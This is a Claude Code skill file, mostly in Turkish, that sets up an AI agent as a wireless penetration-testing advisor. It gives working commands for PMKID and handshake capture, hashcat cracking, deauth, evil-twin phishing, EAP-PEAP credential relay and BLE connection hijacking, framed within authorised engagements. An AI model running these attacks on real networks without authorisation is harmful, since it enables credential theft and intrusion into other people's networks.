--- name: pentest-wireless description: Wireless network pentest — WPA/WPA2/WPA3, evil twin, 802.1X enterprise, Bluetooth advisory. Triggers on wireless pentest, WiFi, WPA2, WPA3, PMKID, evil twin, deauth, Aircrack, hcxdumptool, 802.1X, Bluetooth, BLE security. license: MIT compatibility: Works with Claude Code allowed-tools: Read Write Edit Bash Grep metadata: author: badi badi-version: ">=1.24.0" category: pentest scope: advisory inspired-by: 0xSteph/pentest-ai-agents wireless-pentester --- # pentest-wireless WiFi + Bluetooth pentest advisory. Aktif wifi attack icin **engagement icinde fiziksel mevcudiyet + spectrum izni** gerekir. ## Triggers - "WiFi pentest" - "WPA2 handshake crack" - "WPA3 SAE" - "evil twin" - "deauth saldirisi" - "802.1X PEAP" - "Bluetooth pentest" - "BLE GATT" ## Methodology ``` 1. Recon: airodump-ng / kismet ile passive listen 2. Hedef tespit: SSID, BSSID, channel, encryption, client count 3. Handshake yakala: deauth + capture (WPA2) / PMKID (no client gerekmez) 4. Crack: hashcat / aircrack-ng 5. Post-conn: ARP spoofing + MITM (varsa) 6. Enterprise: EAP-PEAP relay (hostapd-wpe) ``` ## Hedef Tespiti ```bash # QUIET — passive monitor airodump-ng wlan0mon # tum AP listele airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # QUIET — channel hop monitor kismet -c wlan0 ``` ## Handshake Yakalama Yaklasimlar | Yontem | Aciklama | OPSEC | |--------|----------|-------| | 4-way + deauth | Aktif client gerekir + deauth attack | LOUD | | PMKID | Client gerekmez (modern AP zafiyet) | QUIET | | WPS PIN | WPS aktif AP brute (Reaver, Bully) | LOUD | | Evil twin | Kendi AP, kullanici phish | LOUD (yasal risk) | ```bash # PMKID capture (en sessiz, client gerekmez) hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 hcxpcapngtool -o hash.hc22000 pmkid.pcapng # Hashcat crack hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule # 4-way handshake (klasik) aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap ``` ## WPA3 SAE - Dragonblood saldirilari (CVE-2019-9494, CVE-2019-9495): downgrade + side-channel - Transition mode (WPA2 + WPA3) — WPA2 fallback ile downgrade - SAE-PT: pre-shared password tablosu offline (group-specific) ## 802.1X Enterprise ```bash # EAP relay (hostapd-wpe) — kullanici credential capture hostapd-wpe ./hostapd-wpe.conf # Cred captured -> NTLM hash crack (offline) hashcat -m 5500 hash.txt wordlist.txt ``` Onlem: cihaz sertifika dogrulamasi (Server Certificate Validation + CA pin) — kullanici onboarding'de zorunlu olmali. ## Evil Twin (Yasal Cerceve Onemli) - Sadece **kullanici izinli pentest** kapsaminda - AP'nin SSID'sini taklit eden hotspot - Kullanici cred girer -> capture - **Riski**: yanlislikla yetkili kullanici phish + GDPR ihlali ```bash # WiFi-Pumpkin / Pi-Hole AP framework # Pumpkin -i wlan0 --ssid "Corp-Guest" ``` ## Bluetooth / BLE ```bash # QUIET — passive scan hcitool lescan sudo bluetoothctl # > scan on # BLE GATT enumeration gatttool -b AA:BB:CC:DD:EE:FF -I # > connect # > primary # > characteristics # BLE replay/MITM (gatttool + spoof) # btlejack: BLE sniffer + relay btlejack -s # sniff advertisements btlejack -c any -j # hijack connection (CTF/lab) ``` ## Output Sablonu ```markdown ## Wireless Pentest — ### AP Inventaryi - "CorpWiFi" (WPA2-PSK) — handshake yakalandi, crack 3sa (zayif parola) - "CorpEnterprise" (WPA2-EAP) — PEAP relay ile 12 user cred capture - "CorpGuest" (Open) — captive portal bypass denemesi (out-of-scope) ### Bulgu - WPA2-PSK parola "Spring2024" (3sa crack) - Cert validation eksik client cihazlarda -> 802.1X PEAP relay basari ### Onerisi - PSK -> Enterprise EAP-TLS (sertifika) - Cert pin client side zorunlu - WPA3-only mode (transition mode kapat) ``` ## Out-of-Scope - Yetki disi spectrum / izinsiz radio operasyonu (CFAA + yasal risk) - Karsi taraftan deauth ile DoS (legal risk + scope-guard hard refusal) - 3. taraf konumda evil twin